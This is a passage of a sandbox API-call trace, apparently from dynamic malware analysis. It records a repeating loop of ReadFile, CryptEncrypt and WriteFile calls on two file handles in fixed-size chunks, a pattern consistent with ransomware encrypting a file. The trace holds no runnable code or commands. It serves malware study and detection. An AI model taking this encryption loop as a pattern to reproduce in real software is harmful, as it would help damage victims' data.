hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.113] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.113] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.113] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.113] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.113] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.113] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.113] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.113] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.113] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.114] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.114] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.114] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.114] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.114] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.114] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.114] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.114] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.114] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.114] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.115] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.115] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.115] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.115] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.115] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.115] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.115] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.115] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.115] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.115] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.115] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.115] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.116] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.116] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.116] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.116] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.116] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.116] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.116] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.116] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.116] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.116] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.116] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.116] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.117] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.117] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.117] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.117] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.117] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.117] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.117] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.117] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.117] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.117] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.117] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.117] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.118] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.118] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.118] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.118] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.118] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.118] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.118] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.118] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.118] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.118] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.118] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.118] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.118] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.119] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.119] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.119] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.119] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.119] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.119] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.119] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.119] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.119] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.119] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.119] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.119] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.120] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.120] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.120] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.120] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.120] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.120] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.120] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.120] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.120] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.120] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.120] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.121] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.121] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.121] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.121] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.121] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.121] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.121] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.121] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.121] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.121] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.121] CryptEncrypt (in: hKey=0x2facc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: 